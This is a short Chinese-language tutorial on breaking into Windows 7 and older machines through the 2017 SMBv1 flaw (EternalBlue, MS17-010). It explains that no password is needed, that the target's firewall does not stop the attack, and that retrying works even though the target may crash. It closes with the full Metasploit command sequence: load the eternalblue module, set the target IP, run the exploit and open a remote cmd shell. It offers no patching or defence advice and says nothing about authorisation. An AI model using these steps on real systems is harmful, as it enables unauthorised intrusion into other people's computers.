這是一個利用windows SMB V1請求時發生的系統漏洞來取得最高權限的一個入侵方式，是一個2017年的漏洞。

目前對於win7及更早的作業系統有效，入侵他不需要有任何爆破帳號密碼的過程，非常的方便快速，唯一的缺點是有可能導致對方電腦當機重開。所以不一定每次都會成功，但是多執行幾次就會成功了。

這個漏洞方便就是，只要SMB網芳有開，縱使他防火牆都開著、縱使你沒有的帳號密碼，一樣可以打進去(只是時間似乎會比較久)

本漏洞需要用到kali linux自帶的Metasploit渗透工具，你如果是其他系統，可能就需要先安裝他一下

另外就是他會需要再本機開啟4444 port給對方連過來，所以你一定要跟他在同一個網段，不然也會失敗。

msfconsole  #開啟Metasploit 要等他跑一下
use exploit/windows/smb/ms17_010_eternalblue
show options
set rhosts 192.168.2.171  #記得改IP
check
exploit  #或是run都可以
shell #進入cmd